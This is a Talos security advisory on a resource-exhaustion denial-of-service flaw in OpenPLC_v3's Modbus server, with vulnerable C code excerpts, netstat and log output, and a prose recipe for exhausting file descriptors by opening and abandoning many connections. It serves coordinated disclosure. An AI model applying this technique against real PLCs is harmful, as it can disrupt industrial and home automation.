A denial of service vulnerability exists in the ModbusTCP server functionality of OpenPLC _v3 a931181e8b81e36fadf7b74d5cba99b73c3f6d58. A specially crafted series of network connections can lead to the server not processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
OpenPLC _v3 a931181e8b81e36fadf7b74d5cba99b73c3f6d58
OpenPLC_v3 - https://github.com/thiagoralves/OpenPLC_v3
5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
CWE-775 - Missing Release of File Descriptor or Handle after Effective Lifetime
OpenPLC is an open-source programmable logic controller (PLC) designed to provide a low cost option for automation. The platform consists of two parts: the Runtime and the Editor. The Runtime can be deployed on a variety of platforms including Windows, Linux, and various microcontrollers. Common uses for OpenPLC include home automation and industrial security research. OpenPLC supports communication across a variety of protocols, including Modbus and EtherNet/IP. The runtime additionally provides limited support for PCCC transported across EtherNet/IP.
A resource-exhaustion denial of service condition exists in OpenPLC’s handling of Modbus connections. By creating and abandoning many concurrent sessions and then holding one final connection open indefinitely it is possible to use up all of the file descriptors available to the server process and disrupt new connections.
OpenPLC’s processing of Modbus messages begins in server.cpp
in the function startServer
where an infinite loop waits for new connections on the defined port (TCP/502 by default). When a client attempts to connect, the function waitForClient
establishes the connection via accept
, resulting in a socket file descriptor being allocated for the connection ([1]). This connection is subsequently set to blocking mode ([2]).
int waitForClient(int socket_fd, int protocol_type)
{
char log_msg[1000];
int client_fd;
struct sockaddr_in client_addr;
...
while (*run_server)
{
client_fd = accept(socket_fd, (struct sockaddr *)&client_addr, &client_len); // [1]
if (client_fd > 0)
{
SetSocketBlockingEnabled(client_fd, true); // [2]
break;
}
sleepms(100);
}
return client_fd;
}
When the connection is successfully established, a new thread calling the function handleConnections
is created to process the new stream ([3]) and then the main thread’s execution loops back around to wait for the next connection.
void startServer(uint16_t port, int protocol_type)
{
...
while(*run_server)
{
client_fd = waitForClient(socket_fd, protocol_type);
...
else
{
int arguments[2];
pthread_t thread;
int ret = -1;
sprintf(log_msg, "Server: Client accepted! Creating thread for the new client ID: %d...\n", client_fd);
log(log_msg);
arguments[0] = client_fd;
arguments[1] = protocol_type;
ret = pthread_create(&thread, NULL, handleConnections, (void*)arguments); // [3]
if (ret==0)
{
pthread_detach(thread);
}
...
Inside handleConnections
Modbus messages are processed in a loop cycling between waiting for a message from the client ([4]), processing that message, and responding accordingly or exiting ([5]).
void *handleConnections(void *arguments)
{
...
while(*run_server)
{
//unsigned char buffer[NET_BUFFER_SIZE];
//int messageSize;
if (protocol_type == MODBUS_PROTOCOL)
{
messageSize = readModbusMessage(client_fd, buffer, sizeof(buffer) / sizeof(buffer[0])); // [4]
}
...
if (messageSize <= 0 || messageSize > NET_BUFFER_SIZE)
{
// something has gone wrong or the client has closed connection
if (messageSize == 0)
{
sprintf(log_msg, "Modbus Server: client ID: %d has closed the connection\n", client_fd);
log(log_msg);
}
else
{
sprintf(log_msg, "Modbus Server: Something is wrong with the client ID: %d message Size : %i\n", client_fd, messageSize);
log(log_msg);
}
break;
}
processMessage(buffer, messageSize, client_fd, protocol_type); // [5]
}
...
readModbusMessage
uses read
calls ([6] and [7]) to ingest message data from the current stream and return the total number of bytes read. In the event that a client closes the connection after this read
call has been executed, but before any data has been received, the thread will block indefinitely due to its earlier configuration ([2]).
int readModbusMessage(int fd, unsigned char *buffer, size_t bufferSize)
{
int messageSize = 0;
// Read the modbus TCP/IP ADU frame header up to the length field.
#define MODBUS_HEADER_SIZE 6
if (bufferSize < MODBUS_HEADER_SIZE)
{
return -1;
}
do
{
int bytesRead = read(fd, buffer + messageSize, MODBUS_HEADER_SIZE - messageSize); // [6]
if (bytesRead <= 0)
{
return bytesRead;
}
messageSize += bytesRead;
} while (messageSize < MODBUS_HEADER_SIZE);
// Read the length (byte 5 & 6).
uint16_t length = ((uint16_t)buffer[4] << 8) | buffer[5];
size_t totalMessageSize = MODBUS_HEADER_SIZE + length;
if (totalMessageSize > bufferSize)
{
return -1;
}
// Read the rest of the message.
while (messageSize < totalMessageSize)
{
int bytesRead = read(fd, buffer + messageSize, totalMessageSize - messageSize); // [7]
if (bytesRead <= 0)
{
return bytesRead;
}
messageSize += bytesRead;
}
return messageSize;
}
Knowing this, it is possible for a client to tie up all of the socket file descriptors available to the OpenPLC process by opening a large number of connections but never sending an initial request. When this is successful the host system will show a large list of sockets stuck in the CLOSE_WAIT
state (shown below), indicating that the connection was closed by the client but is still being held open by the server.
user@machine:~/src/OpenPLC_v3$ sudo netstat -tpn | grep ":502" | wc -l
1003
user@machine:~/src/OpenPLC_v3$ sudo netstat -tpn | grep ":502" | head
tcp 1 0 10.211.55.20:502 10.211.55.40:50778 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:43992 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:46760 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:50816 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:46516 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:42970 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:43936 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:37884 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:47258 CLOSE_WAIT 491897/./core/openp
tcp 1 0 10.211.55.20:502 10.211.55.40:56744 CLOSE_WAIT 491897/./core/openp
user@machine:~/src/OpenPLC_v3$
This state is additionally reflected in the OpenPLC logs (shown below), indicating that the allocated file descriptor has increased to a value close to the maximum allowed open files for a given process (1024 by default on Ubuntu, verifiable with ulimit -n
).
...
Server: Client accepted! Creating thread for the new client ID: 1023...
Server: waiting for new client...
Server: Thread created for client ID: 1023
Modbus Server: client ID: 1023 has closed the connection
Terminating Modbus connections thread
Server: Client accepted! Creating thread for the new client ID: 1023...
Server: waiting for new client...
Server: Thread created for client ID: 1023
Modbus Server: client ID: 1023 has closed the connection
Terminating Modbus connections thread
Server: Client accepted! Creating thread for the new client ID: 1023...
Server: waiting for new client...
Server: Thread created for client ID: 1023
...
At this point the server has essentially been limited to processing one connection at a time instead of many at the same time. By opening one final connection to the server (this time in blocking mode from the client side as well) and immediately making a recv
call instead of sending a Modbus request, OpenPLC will block in readModbusMessage
waiting for a request that will never come. Since the maximum number of open files for the process will have already been hit, any new connections on other threads will not be reliably processed.
2025-07-16 - Vendor Disclosure
2025-07-16 - Vendor Response
2025-09-23 - Status Update Request
2025-09-23 - Vendor Response
2025-09-24 - Response Acknowledged
2025-10-07 - Public Release
Discovered by a member of Cisco Talos.